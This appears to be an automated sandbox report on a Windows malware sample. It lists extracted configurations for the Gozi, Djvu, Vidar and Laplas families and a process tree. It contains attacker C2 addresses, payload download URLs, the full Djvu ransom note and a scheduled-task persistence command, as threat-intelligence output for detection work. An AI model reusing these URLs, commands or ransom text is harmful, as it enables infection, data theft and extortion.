djvu | 8da61969c3c88bf9025e82604dee8cc104316414affdd91014bc5854633b26cd

Analysis

max time kernel
123s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
17-02-2023 16:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

184KB
MD5

d579f62c108aadb9362749a97b834e64
SHA1

ccb9a032d4a61fd9b3145189a51ec34176776bdf
SHA256

8da61969c3c88bf9025e82604dee8cc104316414affdd91014bc5854633b26cd
SHA512

7f232c52130e13b48a744df43125a3ce37f577fc75c6f3795a01ffdf2fb23e553a9810fdf498b196f679b3829060db93623d674b6eee31bc06629756d714b8bf
SSDEEP

3072:MOydQClFLmVyYAUTV3UvsEIOiN751NgnflCupS8SupG8Vlmazp7r:aflUrLTFA5M9YnflfpS8S2C4d

Score

10^/10

djvu gozi laplas smokeloader vidar 1001 19 backdoor banker clipper discovery evasion isfb persistence ransomware spyware stealer trojan vmprotect

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

1001

https://checklist.skype.com

http://176.10.125.84

http://91.242.219.235

http://79.132.130.73

http://176.10.119.209

http://194.76.225.88

http://79.132.134.158

Attributes

base_path
/microsoft/
build
250256
exe_type
loader
extension
.acx
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

djvu

http://jiqaz.com/lancer/get.php

Attributes

extension
.hhoo
offline_id
dMMXkgwQTycP13C5xwPbHDSzhx1ZxiPgIMZXewt1
payload_url
http://uaery.top/dl/build2.exe

http://jiqaz.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-UQkYLBSiQ4 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0648JOsie

rsa_pubkey.plain

Extracted

Family

vidar

Version

2.5

Botnet

Attributes

profile_id
19

Extracted

Family

laplas

http://45.159.189.105

Attributes

api_key
ad75d4e2e9636ca662a337b6e798d36159f23acfc89bbe9400d0d451bd8d69fd

Signatures

Detected Djvu ransomware 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4584-190-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4584-193-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5028-194-0x0000000002400000-0x000000000251B000-memory.dmp	family_djvu
behavioral2/memory/4584-195-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4584-197-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4584-204-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1228-211-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1228-213-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1228-218-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1228-225-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Detects Smokeloader packer 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1040-133-0x0000000000610000-0x0000000000619000-memory.dmp	family_smokeloader
behavioral2/memory/4460-169-0x00000000006A0000-0x00000000006A9000-memory.dmp	family_smokeloader

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3140 3100 rundll32.exe
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3140	3100	rundll32.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

XandETC.exe

description	pid	process	target process
PID 2656 created 2764	2656	XandETC.exe	Explorer.EXE
PID 2656 created 2764	2656	XandETC.exe	Explorer.EXE
PID 2656 created 2764	2656	XandETC.exe	Explorer.EXE
PID 2656 created 2764	2656	XandETC.exe	Explorer.EXE
PID 2656 created 2764	2656	XandETC.exe	Explorer.EXE

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

143 920 rundll32.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
143	920	rundll32.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

build2.exe93B.exeliyy.exeF0FC.exe19D7.exe19D7.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	build2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	93B.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	liyy.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	F0FC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	19D7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	19D7.exe

Executes dropped EXE 21 IoCs

Processes:

F0FC.exeF1D8.exeF7A5.exeF94C.exe93B.exe14C5.exellpb1133a.exeliyy.exe19D7.exeXandETC.exeliyy.exe19D7.exe19D7.exe19D7.exe8043.exebuild2.exebuild3.exebuild2.exeupdater.exesvcupdater.exemstsca.exe

pid	process
1100	F0FC.exe
4624	F1D8.exe
4460	F7A5.exe
3024	F94C.exe
816	93B.exe
2808	14C5.exe
3528	llpb1133a.exe
3076	liyy.exe
5028	19D7.exe
2656	XandETC.exe
3668	liyy.exe
4584	19D7.exe
632	19D7.exe
1228	19D7.exe
3520	8043.exe
4208	build2.exe
2676	build3.exe
1516	build2.exe
4952	updater.exe
2192	svcupdater.exe
428	mstsca.exe

Loads dropped DLL 4 IoCs

Processes:

rundll32.exebuild2.exerundll32.exe

pid process

4608 rundll32.exe
1516 build2.exe
1516 build2.exe
920 rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

744 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4608	rundll32.exe
1516	build2.exe
1516	build2.exe
920	rundll32.exe

pid	process
744	icacls.exe

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe	vmprotect
behavioral2/memory/3528-164-0x0000000140000000-0x000000014061E000-memory.dmp	vmprotect

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

19D7.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a876875e-8cda-414b-99e3-6cb89fd3f497\\19D7.exe\" --AutoStart"	19D7.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

73 api.2ip.ua
74 api.2ip.ua
91 api.2ip.ua

flow	ioc
73	api.2ip.ua
74	api.2ip.ua
91	api.2ip.ua

Suspicious use of SetThreadContext 3 IoCs

Processes:

19D7.exe19D7.exebuild2.exe

description	pid	process	target process
PID 5028 set thread context of 4584	5028	19D7.exe	19D7.exe
PID 632 set thread context of 1228	632	19D7.exe	19D7.exe
PID 4208 set thread context of 1516	4208	build2.exe	build2.exe

Drops file in Program Files directory 1 IoCs

Processes:

XandETC.exe

description ioc process

File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3140 sc.exe
2672 sc.exe
3296 sc.exe
1920 sc.exe
4156 sc.exe
460 sc.exe
4864 sc.exe
1820 sc.exe
2384 sc.exe
204 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe

pid	process
3140	sc.exe
2672	sc.exe
3296	sc.exe
1920	sc.exe
4156	sc.exe
460	sc.exe
4864	sc.exe
1820	sc.exe
2384	sc.exe
204	sc.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4576	2808	WerFault.exe	14C5.exe
4392	3024	WerFault.exe	F94C.exe
1280	4608	WerFault.exe	rundll32.exe
3192	1100	WerFault.exe	F0FC.exe
616	3520	WerFault.exe	8043.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

file.exeF7A5.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F7A5.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F7A5.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	F7A5.exe

Checks processor information in registry 2 TTPs 25 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exebuild2.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rundll32.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	rundll32.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	rundll32.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4944 schtasks.exe
816 schtasks.exe
1284 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3712 timeout.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 65 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
4944	schtasks.exe
816	schtasks.exe
1284	schtasks.exe

pid	process
3712	timeout.exe

description	flow	ioc
HTTP User-Agent header	65	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exeExplorer.EXE

pid	process
1040	file.exe
1040	file.exe
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE
2764	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

2764 Explorer.EXE
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

file.exeF7A5.exe

pid process

1040 file.exe
4460 F7A5.exe

pid	process
2764	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEpowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeShutdownPrivilege	2764	Explorer.EXE
Token: SeCreatePagefilePrivilege	2764	Explorer.EXE
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeShutdownPrivilege	684	powercfg.exe
Token: SeCreatePagefilePrivilege	684	powercfg.exe
Token: SeShutdownPrivilege	3192	powercfg.exe
Token: SeCreatePagefilePrivilege	3192	powercfg.exe
Token: SeShutdownPrivilege	1260	powercfg.exe
Token: SeCreatePagefilePrivilege	1260	powercfg.exe
Token: SeShutdownPrivilege	756	powercfg.exe
Token: SeCreatePagefilePrivilege	756	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4932	powershell.exe
Token: SeSecurityPrivilege	4932	powershell.exe
Token: SeTakeOwnershipPrivilege	4932	powershell.exe
Token: SeLoadDriverPrivilege	4932	powershell.exe
Token: SeSystemProfilePrivilege	4932	powershell.exe
Token: SeSystemtimePrivilege	4932	powershell.exe
Token: SeProfSingleProcessPrivilege	4932	powershell.exe
Token: SeIncBasePriorityPrivilege	4932	powershell.exe
Token: SeCreatePagefilePrivilege	4932	powershell.exe
Token: SeBackupPrivilege	4932	powershell.exe
Token: SeRestorePrivilege	4932	powershell.exe
Token: SeShutdownPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeSystemEnvironmentPrivilege	4932	powershell.exe
Token: SeRemoteShutdownPrivilege	4932	powershell.exe
Token: SeUndockPrivilege	4932	powershell.exe
Token: SeManageVolumePrivilege	4932	powershell.exe
Token: 33	4932	powershell.exe
Token: 34	4932	powershell.exe
Token: 35	4932	powershell.exe
Token: 36	4932	powershell.exe
Token: SeIncreaseQuotaPrivilege	4932	powershell.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

liyy.exeliyy.exe

pid process

3076 liyy.exe
3076 liyy.exe
3668 liyy.exe
3668 liyy.exe

pid	process
3076	liyy.exe
3076	liyy.exe
3668	liyy.exe
3668	liyy.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Explorer.EXE93B.exeliyy.exerundll32.exe19D7.exeF0FC.exe19D7.exe19D7.exe

description	pid	process	target process
PID 2764 wrote to memory of 1100	2764	Explorer.EXE	F0FC.exe
PID 2764 wrote to memory of 1100	2764	Explorer.EXE	F0FC.exe
PID 2764 wrote to memory of 1100	2764	Explorer.EXE	F0FC.exe
PID 2764 wrote to memory of 4624	2764	Explorer.EXE	F1D8.exe
PID 2764 wrote to memory of 4624	2764	Explorer.EXE	F1D8.exe
PID 2764 wrote to memory of 4624	2764	Explorer.EXE	F1D8.exe
PID 2764 wrote to memory of 4460	2764	Explorer.EXE	F7A5.exe
PID 2764 wrote to memory of 4460	2764	Explorer.EXE	F7A5.exe
PID 2764 wrote to memory of 4460	2764	Explorer.EXE	F7A5.exe
PID 2764 wrote to memory of 3024	2764	Explorer.EXE	F94C.exe
PID 2764 wrote to memory of 3024	2764	Explorer.EXE	F94C.exe
PID 2764 wrote to memory of 3024	2764	Explorer.EXE	F94C.exe
PID 2764 wrote to memory of 816	2764	Explorer.EXE	93B.exe
PID 2764 wrote to memory of 816	2764	Explorer.EXE	93B.exe
PID 2764 wrote to memory of 816	2764	Explorer.EXE	93B.exe
PID 2764 wrote to memory of 2808	2764	Explorer.EXE	14C5.exe
PID 2764 wrote to memory of 2808	2764	Explorer.EXE	14C5.exe
PID 2764 wrote to memory of 2808	2764	Explorer.EXE	14C5.exe
PID 816 wrote to memory of 3528	816	93B.exe	llpb1133a.exe
PID 816 wrote to memory of 3528	816	93B.exe	llpb1133a.exe
PID 816 wrote to memory of 3076	816	93B.exe	liyy.exe
PID 816 wrote to memory of 3076	816	93B.exe	liyy.exe
PID 816 wrote to memory of 3076	816	93B.exe	liyy.exe
PID 2764 wrote to memory of 5028	2764	Explorer.EXE	19D7.exe
PID 2764 wrote to memory of 5028	2764	Explorer.EXE	19D7.exe
PID 2764 wrote to memory of 5028	2764	Explorer.EXE	19D7.exe
PID 816 wrote to memory of 2656	816	93B.exe	XandETC.exe
PID 816 wrote to memory of 2656	816	93B.exe	XandETC.exe
PID 3076 wrote to memory of 3668	3076	liyy.exe	liyy.exe
PID 3076 wrote to memory of 3668	3076	liyy.exe	liyy.exe
PID 3076 wrote to memory of 3668	3076	liyy.exe	liyy.exe
PID 3140 wrote to memory of 4608	3140	rundll32.exe	rundll32.exe
PID 3140 wrote to memory of 4608	3140	rundll32.exe	rundll32.exe
PID 3140 wrote to memory of 4608	3140	rundll32.exe	rundll32.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 5028 wrote to memory of 4584	5028	19D7.exe	19D7.exe
PID 1100 wrote to memory of 1284	1100	F0FC.exe	schtasks.exe
PID 1100 wrote to memory of 1284	1100	F0FC.exe	schtasks.exe
PID 1100 wrote to memory of 1284	1100	F0FC.exe	schtasks.exe
PID 4584 wrote to memory of 744	4584	19D7.exe	icacls.exe
PID 4584 wrote to memory of 744	4584	19D7.exe	icacls.exe
PID 4584 wrote to memory of 744	4584	19D7.exe	icacls.exe
PID 4584 wrote to memory of 632	4584	19D7.exe	19D7.exe
PID 4584 wrote to memory of 632	4584	19D7.exe	19D7.exe
PID 4584 wrote to memory of 632	4584	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 632 wrote to memory of 1228	632	19D7.exe	19D7.exe
PID 2764 wrote to memory of 3520	2764	Explorer.EXE	8043.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1040

C:\Users\Admin\AppData\Local\Temp\F0FC.exe
C:\Users\Admin\AppData\Local\Temp\F0FC.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
3⤵
- Creates scheduled task(s)
PID:1284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 1092
3⤵
- Program crash
PID:3192

C:\Users\Admin\AppData\Local\Temp\F1D8.exe
C:\Users\Admin\AppData\Local\Temp\F1D8.exe
2⤵
- Executes dropped EXE
PID:4624

C:\Users\Admin\AppData\Local\Temp\F7A5.exe
C:\Users\Admin\AppData\Local\Temp\F7A5.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4460

C:\Users\Admin\AppData\Local\Temp\F94C.exe
C:\Users\Admin\AppData\Local\Temp\F94C.exe
2⤵
- Executes dropped EXE
PID:3024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 448
3⤵
- Program crash
PID:4392

C:\Users\Admin\AppData\Local\Temp\93B.exe
C:\Users\Admin\AppData\Local\Temp\93B.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:816

C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe
"C:\Users\Admin\AppData\Local\Temp\llpb1133a.exe"
3⤵
- Executes dropped EXE
PID:3528

C:\Users\Admin\AppData\Local\Temp\liyy.exe
"C:\Users\Admin\AppData\Local\Temp\liyy.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3076

C:\Users\Admin\AppData\Local\Temp\liyy.exe
"C:\Users\Admin\AppData\Local\Temp\liyy.exe" -h
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3668

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:2656

C:\Users\Admin\AppData\Local\Temp\14C5.exe
C:\Users\Admin\AppData\Local\Temp\14C5.exe
2⤵
- Executes dropped EXE
PID:2808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 816
3⤵
- Program crash
PID:4576

C:\Users\Admin\AppData\Local\Temp\19D7.exe
C:\Users\Admin\AppData\Local\Temp\19D7.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5028

C:\Users\Admin\AppData\Local\Temp\19D7.exe
